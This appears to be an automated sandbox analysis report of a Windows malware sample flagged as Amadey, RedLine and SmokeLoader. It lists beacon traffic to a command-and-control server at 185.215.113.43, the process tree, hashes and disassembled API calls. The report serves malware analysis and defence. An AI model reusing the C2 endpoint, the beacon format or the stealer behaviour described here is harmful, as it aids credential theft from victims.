Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 08:00:14.335133076 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 08:00:15.031692028 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 06:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	49749	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 08:00:16.551474094 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 08:00:17.254604101 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 06:00:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	49750	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 08:00:18.887989044 CEST	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 25, 2024 08:00:19.576565027 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 06:00:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	49751	185.215.113.43	80	4620	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 08:00:21.468439102 CEST	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E8
Sep 25, 2024 08:00:22.193391085 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 25 Sep 2024 06:00:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Target ID:	0
Start time:	01:58:16
Start date:	25/09/2024
Path:	C:\Users\user\Desktop\p3aYwXKO5T.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\p3aYwXKO5T.exe"
Imagebase:	0x400000
File size:	430'592 bytes
MD5 hash:	0AE8B048945C6CED85DF3FB5AFA2BC0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1686331848.000000000079F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1491870136.0000000002390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:58:21
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 724
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:58:22
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 772
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:58:23
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 804
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:58:24
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 856
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:58:25
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 784
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:58:26
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 432 -ip 432
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:58:26
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 904
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:58:27
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1012
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	01:58:28
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1044
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	01:58:29
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1140
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	01:58:30
Start date:	25/09/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x400000
File size:	430'592 bytes
MD5 hash:	0AE8B048945C6CED85DF3FB5AFA2BC0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000015.00000002.1705935436.00000000005AC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000003.1657991300.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	01:58:30
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1476
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	01:58:37
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 476
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	01:58:58
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	01:59:00
Start date:	25/09/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x400000
File size:	430'592 bytes
MD5 hash:	0AE8B048945C6CED85DF3FB5AFA2BC0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000020.00000002.2708185085.00000000007A0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000002.2708366906.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000020.00000002.2708366906.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000002.2707467490.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000020.00000003.1929134301.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	01:59:04
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 524
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	01:59:06
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 536
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	01:59:06
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 720
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	01:59:07
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 720
Imagebase:	0x9f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	4.4%
Signature Coverage:	27.2%
Total number of Nodes:	658
Total number of Limit Nodes:	25

Executed Functions

Function 0040AA09 Relevance: 48.8, APIs: 24, Strings: 3, Instructions: 1503COMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32(00000000,53A352EA,00000000), ref: 0040AA0C

Strings

h-F, xrefs: 0040AA50
VUUU, xrefs: 0040AF82
@3P, xrefs: 0040B921

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CurrentDirectory
String ID: @3P$VUUU$h-F
API String ID: 1611563598-1891901568
Opcode ID: de469c50572d96fa831817a3e8334893a081dba1cd581f061f222784eee2821c
Instruction ID: 9340701fd5f7403cf7ba50309dfb341378973f904e2d2e41fb1fe6cd50d97ea3
Opcode Fuzzy Hash: de469c50572d96fa831817a3e8334893a081dba1cd581f061f222784eee2821c
Instruction Fuzzy Hash: 4AC2C271A002089FDB18DF28CD89BDEB775EF45304F5081AEE409A72D1DB799A84CF99

Function 00409A00 Relevance: 30.4, APIs: 16, Strings: 1, Instructions: 668COMMON

Download Yara Rule

APIs

Part of subcall function 00408B30: GetTempPathA.KERNEL32(00000104,?,53A352EA,?,00000000), ref: 00408B77

GetFileAttributesA.KERNEL32(00000000), ref: 00409A73

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AttributesFilePathTemp
String ID: T2F
API String ID: 3199926297-3862687658
Opcode ID: df180cf6ccc42a80ff8a097845aaf710529a4aa3076e3f0e8fe5be7919888161
Instruction ID: f8d341d7b221fbf4855467c9c2f70b5ca956d984b14cba194293e40f11c0d304
Opcode Fuzzy Hash: df180cf6ccc42a80ff8a097845aaf710529a4aa3076e3f0e8fe5be7919888161
Instruction Fuzzy Hash: D942E770D00244DBEF14EBB8C6497DE7BB2AF06314F24466AD411773C2D77D5A848BAA

Function 00407D30 Relevance: 7.9, APIs: 5, Instructions: 422
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,53A352EA), ref: 00407DAA
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407E0B
GetProcAddress.KERNEL32(00000000), ref: 00407E12
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407ED3
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407ED7

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProcVersion
String ID:
API String ID: 374719553-0
Opcode ID: 43ca09576ce7c24a49e7d91595eab8dde10c4ec89019c759e4370e9cc0113e14
Instruction ID: d767b28cf4d1304312a0b4bfeaf627bf696c138522586543ff54ff165ce39ac5
Opcode Fuzzy Hash: 43ca09576ce7c24a49e7d91595eab8dde10c4ec89019c759e4370e9cc0113e14
Instruction Fuzzy Hash: B4E10A70E00654A7DB14BB28CD0B39E7671AB82714F5442AEE815773C2DB7D4E858BCB

Function 0043652B Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0043652A,?,?,?,?,?,00437661), ref: 0043654D
TerminateProcess.KERNEL32(00000000,?,0043652A,?,?,?,?,?,00437661), ref: 00436554
ExitProcess.KERNEL32 ref: 00436566

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 04b207d0b889d00e4800d5972e07640bc64685a596502c952aa2fb778607a5b5
Instruction ID: 8ba592f2701f3bed1e9346099357e5860ce392234eb0f7d34856f934df6fdfbc
Opcode Fuzzy Hash: 04b207d0b889d00e4800d5972e07640bc64685a596502c952aa2fb778607a5b5
Instruction Fuzzy Hash: D7E0EC35000649BFCF116F59ED0D9493B69FB48746F059435FA0A86232CB7ADD92CF89

Function 007A00D6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007A00FE
Module32First.KERNEL32(00000000,00000224), ref: 007A011E

Memory Dump Source

Source File: 00000000.00000002.1686331848.000000000079F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0079F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79f000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 8b38316a72e01a353593db045b2f090c2d325e49d05ef08911d7cfb6a7d68221
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 6EF068321007156FD7203BF5988DBAF76E8AF8A725F100628E642910C0DA74E8454691

Function 0040B1A0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0040B1ED

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 86a4361ad296d9a7c7be782d3087d9ac5decf79edf26736f0f3b57da14de4269
Instruction ID: 04b2a403b83c723c030908a0a5e120f00658eb7981edf9051d4d18a2c30bc2f5
Opcode Fuzzy Hash: 86a4361ad296d9a7c7be782d3087d9ac5decf79edf26736f0f3b57da14de4269
Instruction Fuzzy Hash: 0B211AB191015CABDB2ACF54CD65BEAB7B8EB19704F0042DDA50A63281D7745B88CFA0

Function 00405C10 Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0000043f, xrefs: 0040612B
Keyboard Layout\Preload, xrefs: 00406054
00000419, xrefs: 00406098
00000422, xrefs: 004060C9
00000423, xrefs: 004060FA

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: cc3441c8cc69dd047227bf6c51d55cfe6d1894cac9eb61caf101bb13ff3a2e9e
Instruction ID: 448877648adff1088d2a9d486534a169f5918e2e35df4f0b5b8ee8aeb0257759
Opcode Fuzzy Hash: cc3441c8cc69dd047227bf6c51d55cfe6d1894cac9eb61caf101bb13ff3a2e9e
Instruction Fuzzy Hash: 5DF1C170900248ABEB24DF54CD85BDEBBB9EB45304F5041AAF509A72C1DB789A84CF99

Function 00441ABC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00441775: CreateFileW.KERNELBASE(00000000,00000000,?,00441B65,?,?,00000000,?,00441B65,00000000,0000000C), ref: 00441792

GetLastError.KERNEL32 ref: 00441BD0
__dosmaperr.LIBCMT ref: 00441BD7
GetFileType.KERNELBASE(00000000), ref: 00441BE3
GetLastError.KERNEL32 ref: 00441BED
__dosmaperr.LIBCMT ref: 00441BF6
CloseHandle.KERNEL32(00000000), ref: 00441C16
CloseHandle.KERNEL32(0043AC92), ref: 00441D63
GetLastError.KERNEL32 ref: 00441D95
__dosmaperr.LIBCMT ref: 00441D9C

Strings

H, xrefs: 00441D21

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 7e17bc01896d330f6a953f9dbc221eb630c8e931c060a5af7141eb9f4136a765
Instruction ID: 908140145710097c147751781d0df85f7731599b948b663735adbecd062618f5
Opcode Fuzzy Hash: 7e17bc01896d330f6a953f9dbc221eb630c8e931c060a5af7141eb9f4136a765
Instruction Fuzzy Hash: 20A13972A041489FDF19DF68DC91BAE3BB1EB0A324F14015EE811EB3E1D7389942CB59

Function 0040D79C Relevance: 13.9, APIs: 9, Instructions: 446
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040D913
CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 0040DA2F
send.WS2_32(?,?,00000004,00000000), ref: 0040DC2E
send.WS2_32(?,?,00000008,00000000), ref: 0040DC6A

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: send$CreateDirectoryFileModuleName
String ID:
API String ID: 2319890793-0
Opcode ID: 80b1132b2e69c19d12a8b7e2791303c1400add0845b9d63165f9072d547c2120
Instruction ID: eff085a8820556ef2d338989dca7f7ae17fa1bf24247e87c950f3b595bb29a8c
Opcode Fuzzy Hash: 80b1132b2e69c19d12a8b7e2791303c1400add0845b9d63165f9072d547c2120
Instruction Fuzzy Hash: 02F10571D042189BDB24DB68CC49BDEB775AF45314F1042AEE409B72C2DB789EC8CB99

Function 0232003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0232024D

Strings

kernel32.dll, xrefs: 0232008F, 02320095
cess, xrefs: 0232018D

Memory Dump Source

